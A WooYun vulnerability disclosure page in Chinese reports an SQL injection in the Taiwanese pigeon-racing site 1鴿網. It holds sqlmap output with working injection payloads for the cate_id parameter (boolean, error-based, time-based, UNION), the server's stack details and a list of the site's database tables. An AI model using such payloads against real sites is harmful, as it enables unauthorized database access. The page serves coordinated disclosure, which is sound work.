当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162739

漏洞标题:1鴿網某处SQL注入漏洞(臺灣地區)

相关厂商:1鴿網

漏洞作者: 路人甲

提交时间:2015-12-21 12:35

修复时间:2016-02-04 17:47

公开时间:2016-02-04 17:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-21: 细节已通知厂商并且等待厂商处理中
2015-12-23: 厂商已经确认,细节仅向厂商公开
2016-01-02: 细节向核心白帽子及相关领域专家公开
2016-01-12: 细节向普通白帽子公开
2016-01-22: 细节向实习白帽子公开
2016-02-04: 细节向公众公开

简要描述:

详细说明:

1鴿網於2009年5月正式上線,為因應全球鴿界資訊的網路化;我們提供一個全新的網路信鴿交流平台,網路商城更提供了網路鴿展、網路拍賣等強大功能和服務平台即推向廣大鴿友,以及豐富的鴿用品目錄平台;跨越兩岸.環繞全球
注入点:http://**.**.**.**/cn/01news/newsDia.php?cate_id=39&bull_id=12220

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cate_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cate_id=39 AND 4552=4552&bull_id=12220
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cate_id=39 AND (SELECT 9637 FROM(SELECT COUNT(*),CONCAT(0x7176627a71,(SELECT (ELT(9637=9637,1))),0x717a767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&bull_id=12220
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: cate_id=39 AND (SELECT * FROM (SELECT(SLEEP(5)))bgGC)&bull_id=12220
    Type: UNION query
    Title: MySQL UNION query (NULL) - 57 columns
    Payload: cate_id=-8179 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x6546786d49566b704b59,0x717a767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&bull_id=12220
---
web application technology: PHP 5.3.27
back-end DBMS: MySQL 5.0
current database:    'pigeon_cn'
current user is DBA:    False


数据量还挺大的哦!

Database: pigeon_cn
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| main_gather            | 1528550 |
| loginlog2              | 4020    |
| bulletin_img           | 3202    |
| hotkeyword             | 3115    |
| weekdiscuss_old        | 2961    |
| loginlog               | 1681    |
| bulletin               | 1181    |
| tb_groups_modules_link | 168     |
| sale_group2            | 95      |
| tb_modules             | 75      |
| newsdiscuss            | 52      |
| article_order_item     | 40      |
| files                  | 40      |
| bull_cate              | 30      |
| tb_cate                | 12      |
| pigeon_shop_events     | 10      |
| tb_useitem             | 8       |
| tb_groups_users_link   | 6       |
| users                  | 6       |
| tb_groups              | 4       |
| article                | 3       |
| station                | 3       |
| tb_cate_sort           | 2       |
| `open`                 | 1       |
| articles_config        | 1       |
| auction_content        | 1       |
| limit_ip               | 1       |
| limit_mb               | 1       |
| pigeon                 | 1       |
| sys_parameter          | 1       |
+------------------------+---------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-23 04:15

厂商回复:

感謝通報

最新状态:

暂无